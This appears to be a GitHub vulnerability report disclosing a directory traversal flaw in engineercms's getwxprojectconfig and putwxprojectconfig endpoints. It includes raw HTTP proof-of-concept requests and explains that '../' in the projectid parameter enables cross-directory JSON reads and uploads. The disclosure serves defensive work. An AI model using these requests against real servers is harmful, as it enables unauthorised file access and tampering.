The engineercms has a directory traversal vulnerability. #95
Description
Summary
Version 20250429 of engineercms has a directory traversal vulnerability, allowing json files to be uploaded across directories and read across directories
Vulnerability path:
/v1/admin/getwxprojectconfig
/v1/admin/putwxprojectconfig
Details
json文件读取poc:
GET /v1/admin/getwxprojectconfig?projectid=25014 HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://10.4.9.55:8082/v1/admin/jsoneditor?projectid=25014
Cookie:
json文件上传poc(需要管理员权限)
POST /v1/admin/putwxprojectconfig?projectid=25014 HTTP/1.1
Host: 10.4.9.55:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 2
Origin: http://10.4.9.55:8082
Connection: keep-alive
Referer: http://10.4.9.55:8082/v1/admin/jsoneditor?projectid=25014
Cookie: hotqinsessionid=798b8ad62e3c70b4490ce6d8b43bbc16
Priority: u=0
11
The locations of the function points are as follows:
The request data packet for reading the JSON file across directories using "../".
Use the request data packet to save the JSON file across directories using "../".
Code
The corresponding processing function for file upload is as follows. As can be seen, the input path is directly concatenated into a string, and the use of "../" can enable cross-directory upload of json files.
The corresponding processing functions for file reading are as follows. Similarly:
